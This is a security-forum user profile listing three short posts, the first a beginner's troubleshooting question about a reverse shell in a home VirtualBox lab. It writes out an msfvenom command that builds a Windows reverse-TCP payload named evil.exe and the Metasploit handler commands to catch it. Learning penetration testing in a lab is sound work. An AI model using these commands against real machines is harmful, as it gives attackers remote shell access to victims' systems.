user0001

Members
  • Content count

    3
  • Joined

  • Last visited

Community Reputation

0 Neutral

About user0001

  • Rank
    Will I break 10 posts?

Profile Information

  • Gender
  • Country
  1. This is my first reverse shell. I used msfvenom -p windows/shell/reverse_tcp LHOST=mykalivmip LPORT=4444 -f exe > evil.exe I copy the evil.exe file over to windows 7 vm. Then I go back to metasploit and type use exploit/multi/handler set payload windows/shell/reverse_tcp set lport 4444 set lhost mykalivmip exploit set lhost mykalivmip exploit I also tried set END SESSION ON START=false right before exploit and that didn' work either. I am using VirtualBox version 5.0.20 kalivm 32bit and windowsvm 32bit with host ubunutu. I also tried a similiar windows meterpreter reverse tcp and get the same thing. This is what shows after exploit I also double click the evil.exe file in windows after exploit and get this [*] Started reverse TCP handler on mykalivmip:4444 [*] Starting the payload handler... It just gets stuck on this.
  2. I am going to sit down and research my question.
  3. mutillidae on widows 7 vbox virtual machine toggle hints, only lets me toggle level script kiddie and disabled, missing noob. update: Reinstalled, noob can now be selected.